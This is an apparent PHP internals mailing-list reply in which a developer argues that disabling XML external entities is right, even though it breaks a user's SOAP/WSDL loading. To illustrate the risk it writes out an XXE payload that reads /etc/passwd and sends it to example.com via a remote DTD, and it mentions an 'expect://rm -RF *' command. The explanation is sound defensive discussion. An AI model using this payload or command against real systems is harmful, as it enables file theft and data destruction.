Jake,
On Thu, Jul 30, 2015 at 1:06 PM, Jake <p...@freepanel.net> wrote: > Hello > > Disabling this will (at least for me) cause SOAP related stuff to stop > working as it was expected to work before! The problem here is that imagine the following: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE roottag [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://example.com/evil1.dtd";> and then evil1.dtd: <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/content?%file;'>"> %all; The contents of /etc/passwd would be sent as the url prameter to http://example.com/content. That works for any file that the server has access to. And if you have the expect extension installed it could be MUCH worse. You could use the URL "expect://rm -RF *" and boom goes the dynamite. So yeah, while I completely get that some things like SOAP require external entities, they are also *exceedingly* dangerous. And only to be used with *extremely* trusted endpoints. > <?php > $wsdl = "https://www.some.tld/soap.php?wsdl";; > > $soap = SoapServer($wsdl, array(....)); > > wsdl: > > <?xml version="1.0" encoding="utf-8"?> > <wsdl:definitions xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"; > xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"; > xmlns:s="http://www.w3.org/2001/XMLSchema"; > > xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"; > xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"; > xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"; > xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"; > xmlns:tns="http://www.some.tld/soap/muppet/user/1.0/"; > > targetNamespace="http://www.some.tld/soap/muppet/user/1.0/";> > <wsdl:types> > > <s:schema > targetNamespace="http://www.some.tld/soap/muppet/user/1.0/"; > xmlns:tns="http://www.some.tld/soap/muppet/user/1.0/"; > elementFormDefault="qualified"> > > ... > > It fails with > > error to read external entity, failed while parsing external entity > 'http://www.some.tld/muppet.php?wsdl' I know that you want it to work, but this is actually a great place to fail, because you're loading a trusted resource over HTTP. Meaning that an attacker could MITM and inject malicous XML into the response, and own your server without even needing to own the endpoint. > .. > > I dont know if i get this error correct but to me it looks like PHP on "www > frontend" refuse to read WSDL/SOAP/XML from "www backend" because of this... > Petty much of the SOAP idea is gone then..? I thought SOAP was dead already. Kidding aside, the vulnerability isn't super-well-known but also can be extremely dangerous. Not can-be; is. So something to consider. Anthony -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
